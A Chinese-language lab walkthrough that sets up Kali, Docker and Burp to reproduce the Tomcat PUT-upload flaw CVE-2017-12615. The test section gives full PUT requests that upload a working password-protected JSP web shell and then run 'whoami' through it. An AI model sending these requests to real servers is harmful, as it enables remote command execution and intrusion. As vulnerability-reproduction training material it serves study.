1 安装kali系统
1.1 下载VMware压缩包
kali-linux-2022.1
默认的用户和密码是kali
1.2 初始化系统
sudo apt update -y #kali
sudo apt install -y sogoupinyin fcitx
sudo dpkg-reconfigure locales #添加[x] zh_CN.UTF-8 UTF-8
sudo reboot
1.3 安装docker
vim /etc/apt/sources.list.d/docker.list
deb [arch=amd64] https://download.docker.com/linux/debian buster stable
sudo apt update -y
sudo apt install -y docker-ce
1.4 安装docker-compse
sudo apt install -y docker-compose
2 配置burp代理
2.1 在应用程序那里找到burpite
2.2 proxy->options中添加代理
2.3 浏览器->添加proxy中写burp开启的代理
2.4 浏览器添加burp的证书
3 配置CVE-2017-12615环境
sudo docker run -it -p 8080:8080 cved/cve-2017-12615 bash #kali
root@cac77cc04871:/usr/local/tomcat# bin/catalina.sh start
#这里暂时不要关闭窗口
4 测试
先用浏览器访问
firefox http://127.0.0.1:8080
在brup中找到http proyx中找历史信息,确认代理是否生效
然后打开brup的repeater编辑request
PUT /1.jsp::$DATA HTTP/1.1
Host: 192.168.144.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 659
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
-------------------------------------------------------------------------------------------------------
PUT /2.jsp/ HTTP/1.1
Host: 192.168.144.128:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 664
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("password"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
发送请求
http://127.0.0.1:8080/2.jsp?cmd=whoami&password=023 #正常就返回系统用户了